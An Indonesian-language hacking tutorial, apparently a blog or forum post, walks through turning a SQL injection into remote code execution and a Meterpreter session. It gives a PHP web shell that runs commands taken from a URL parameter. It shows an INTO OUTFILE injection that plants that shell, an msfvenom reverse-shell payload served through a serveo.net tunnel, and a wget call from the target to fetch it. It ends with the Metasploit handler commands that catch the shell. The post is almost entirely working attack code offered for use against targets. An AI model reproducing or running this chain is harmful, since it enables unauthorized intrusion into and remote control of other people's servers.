hay guys kali ini cakil akan share tutorial
Sql Injection and RCE into Meterpreter
kuy lah langsung aja step by step nya..

1.siap kan script rce nya
<?php
echo "Remote Code Execution <br>";
$command=$_GET['command'];
system($command);
?>

2.siapkan file metasploit nya
command :
msfvenom -p php/meterpreter/reverse_tcp
LHOST=hostmu LPORT=portmu -f raw > /home/user/meterpreter.php
##
buka file yang tadi kita buat lalu ilangkan tag # atau penutup pada <?php, supaya file php nya berfungsi layaknya file php

search target vuln
example :
http://targetvuln.org/news.php?id=2<sqli>

example RCE With Sql injection :
http://targetvuln.org/news.php?id=2
union select 1,2,3,"<?php $command=$_GET['command'];system($command); ?>",4,5,6 INTO OUTFILE "/path/path/path/rce.php"


nah setelah selesai di up rce nya skrng kita forward http web server kita atau bisa up ke website kalian meterpreter nya

forward http web server
with serveo
root@mrcakil:~#service apache2 restart
root@mrcakip:~#mv meterpreter.php /var/www/html
root@mrcakil:~#ssh -R remotePort:localhost:localportApache serveo.net

nah kalo dh selesai kita forward..
skrng kita rce web nya
http://targetvuln.org/rce.php?command=wget http://acakHuruf.serveo.net/meterpreter.php

setelah terpasang meterpreternya
masuka command :
root@mrcakil:~#msfconsole
msf>use exploit/multi/handler
msf exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost hostmu
msf exploit(multi/handler) > set lport portmu
msf exploit(multi/handler) > exploit

nah setelah selesai buka file nya
http://targetvuln.org/meterpreter.php

balik lagi ke terminal
and bum...
SQL INJECTION AND RCE INTO METERPRETER  pwned :V
sekian dan terima kasih...